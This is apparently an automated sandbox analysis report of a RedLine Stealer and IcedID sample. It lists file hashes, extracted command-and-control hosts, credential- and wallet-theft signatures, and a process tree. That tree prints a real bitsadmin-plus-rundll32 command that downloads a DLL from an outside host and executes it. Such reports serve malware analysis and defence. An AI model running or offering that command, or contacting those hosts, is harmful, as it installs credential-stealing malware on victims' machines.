Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
12-05-2021 07:56
Static task
static1
Behavioral task
behavioral1
Sample
680c60bd9161140133992d026fabdfc5.exe
Resource
win7v20210410
General
-
Target
680c60bd9161140133992d026fabdfc5.exe
-
Size
997KB
-
MD5
680c60bd9161140133992d026fabdfc5
-
SHA1
1f5a81fdfecd613f6a0c6362a2c7b1757d642bf5
-
SHA256
d6c5d0d59ecf0f03c81e42ab58ca052a806bc9f145688441e1fe7038c0ed9f0c
-
SHA512
7e64ead53d6abbe8efa8ba18ad7764aa36d4692f6b92cc03bc9999511bd94f8a83bdfa98edcf07bb98c81785ee20d791c5cb06181caeb07cb3dc0435332de2ca
Malware Config
Extracted
redline
zastaredan.xyz:80
Extracted
icedid
704617075
icouldmakeyoubelieve.top
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/2632-125-0x0000000000400000-0x000000000041C000-memory.dmp family_redline behavioral2/memory/2632-126-0x00000000004163C2-mapping.dmp family_redline -
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 21 2792 rundll32.exe -
Downloads MZ/PE file
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
680c60bd9161140133992d026fabdfc5.exedescription pid process target process PID 1824 set thread context of 2632 1824 680c60bd9161140133992d026fabdfc5.exe 680c60bd9161140133992d026fabdfc5.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
680c60bd9161140133992d026fabdfc5.exerundll32.exepid process 2632 680c60bd9161140133992d026fabdfc5.exe 2632 680c60bd9161140133992d026fabdfc5.exe 2792 rundll32.exe 2792 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
680c60bd9161140133992d026fabdfc5.exedescription pid process Token: SeDebugPrivilege 2632 680c60bd9161140133992d026fabdfc5.exe -
Suspicious use of WriteProcessMemory 19 IoCs
Processes:
680c60bd9161140133992d026fabdfc5.exe680c60bd9161140133992d026fabdfc5.execmd.exerundll32.exedescription pid process target process PID 1824 wrote to memory of 2632 1824 680c60bd9161140133992d026fabdfc5.exe 680c60bd9161140133992d026fabdfc5.exe PID 1824 wrote to memory of 2632 1824 680c60bd9161140133992d026fabdfc5.exe 680c60bd9161140133992d026fabdfc5.exe PID 1824 wrote to memory of 2632 1824 680c60bd9161140133992d026fabdfc5.exe 680c60bd9161140133992d026fabdfc5.exe PID 1824 wrote to memory of 2632 1824 680c60bd9161140133992d026fabdfc5.exe 680c60bd9161140133992d026fabdfc5.exe PID 1824 wrote to memory of 2632 1824 680c60bd9161140133992d026fabdfc5.exe 680c60bd9161140133992d026fabdfc5.exe PID 1824 wrote to memory of 2632 1824 680c60bd9161140133992d026fabdfc5.exe 680c60bd9161140133992d026fabdfc5.exe PID 1824 wrote to memory of 2632 1824 680c60bd9161140133992d026fabdfc5.exe 680c60bd9161140133992d026fabdfc5.exe PID 1824 wrote to memory of 2632 1824 680c60bd9161140133992d026fabdfc5.exe 680c60bd9161140133992d026fabdfc5.exe PID 2632 wrote to memory of 812 2632 680c60bd9161140133992d026fabdfc5.exe cmd.exe PID 2632 wrote to memory of 812 2632 680c60bd9161140133992d026fabdfc5.exe cmd.exe PID 2632 wrote to memory of 812 2632 680c60bd9161140133992d026fabdfc5.exe cmd.exe PID 812 wrote to memory of 1176 812 cmd.exe bitsadmin.exe PID 812 wrote to memory of 1176 812 cmd.exe bitsadmin.exe PID 812 wrote to memory of 1176 812 cmd.exe bitsadmin.exe PID 812 wrote to memory of 1884 812 cmd.exe rundll32.exe PID 812 wrote to memory of 1884 812 cmd.exe rundll32.exe PID 812 wrote to memory of 1884 812 cmd.exe rundll32.exe PID 1884 wrote to memory of 2792 1884 rundll32.exe rundll32.exe PID 1884 wrote to memory of 2792 1884 rundll32.exe rundll32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\680c60bd9161140133992d026fabdfc5.exe"C:\Users\Admin\AppData\Local\Temp\680c60bd9161140133992d026fabdfc5.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\680c60bd9161140133992d026fabdfc5.exe"C:\Users\Admin\AppData\Local\Temp\680c60bd9161140133992d026fabdfc5.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"cmd" /C bitsadmin /transfer debjob /download /priority HIGH https://customwrappro.com/adm/digital39/syscert.dll %tmp%\name.dll && rundll32 %tmp%\name.dll,PluginInit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer debjob /download /priority HIGH https://customwrappro.com/adm/digital39/syscert.dll C:\Users\Admin\AppData\Local\Temp\name.dll4⤵
- Download via BitsAdmin
-
C:\Windows\SysWOW64\rundll32.exerundll32 C:\Users\Admin\AppData\Local\Temp\name.dll,PluginInit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exerundll32 C:\Users\Admin\AppData\Local\Temp\name.dll,PluginInit5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\680c60bd9161140133992d026fabdfc5.exe.logMD5
5b50852bf977f644bcd5997b7b5883c1
SHA18b53694b796620422b366dc5b8dbb3ce3060473c
SHA256667bc8c8d53eddf6355877344b669db4fb9762e6320afc7316c3786213a254a9
SHA5127e794fa7de5eca585000ef840ca821f36205d25b389747339d8b8d58b1ef3cd16306e62288f86027cbe6a76eeccc9dc7634a11c94ba551f3ce42ee874fac712d
-
memory/812-141-0x0000000000000000-mapping.dmp
-
memory/1176-142-0x0000000000000000-mapping.dmp
-
memory/1824-121-0x0000000005800000-0x000000000580E000-memory.dmpFilesize
56KB
-
memory/1824-119-0x00000000054F0000-0x00000000054F1000-memory.dmpFilesize
4KB
-
memory/1824-120-0x00000000056F0000-0x00000000056F1000-memory.dmpFilesize
4KB
-
memory/1824-114-0x0000000000BF0000-0x0000000000BF1000-memory.dmpFilesize
4KB
-
memory/1824-122-0x00000000055B0000-0x0000000005AAE000-memory.dmpFilesize
5.0MB
-
memory/1824-123-0x00000000062B0000-0x0000000006339000-memory.dmpFilesize
548KB
-
memory/1824-124-0x0000000001570000-0x00000000015B6000-memory.dmpFilesize
280KB
-
memory/1824-116-0x0000000005500000-0x0000000005501000-memory.dmpFilesize
4KB
-
memory/1824-118-0x0000000005650000-0x0000000005651000-memory.dmpFilesize
4KB
-
memory/1824-117-0x0000000005AB0000-0x0000000005AB1000-memory.dmpFilesize
4KB
-
memory/1884-143-0x0000000000000000-mapping.dmp
-
memory/2632-131-0x0000000002860000-0x0000000002861000-memory.dmpFilesize
4KB
-
memory/2632-132-0x00000000028C0000-0x00000000028C1000-memory.dmpFilesize
4KB
-
memory/2632-133-0x0000000004E50000-0x0000000004E51000-memory.dmpFilesize
4KB
-
memory/2632-134-0x0000000005100000-0x0000000005101000-memory.dmpFilesize
4KB
-
memory/2632-135-0x0000000004E50000-0x0000000005456000-memory.dmpFilesize
6.0MB
-
memory/2632-138-0x0000000006820000-0x0000000006821000-memory.dmpFilesize
4KB
-
memory/2632-139-0x0000000006F20000-0x0000000006F21000-memory.dmpFilesize
4KB
-
memory/2632-140-0x0000000006180000-0x0000000006181000-memory.dmpFilesize
4KB
-
memory/2632-130-0x0000000005460000-0x0000000005461000-memory.dmpFilesize
4KB
-
memory/2632-126-0x00000000004163C2-mapping.dmp
-
memory/2632-125-0x0000000000400000-0x000000000041C000-memory.dmpFilesize
112KB
-
memory/2792-144-0x0000000000000000-mapping.dmp
-
memory/2792-145-0x000001F262FD0000-0x000001F26302B000-memory.dmpFilesize
364KB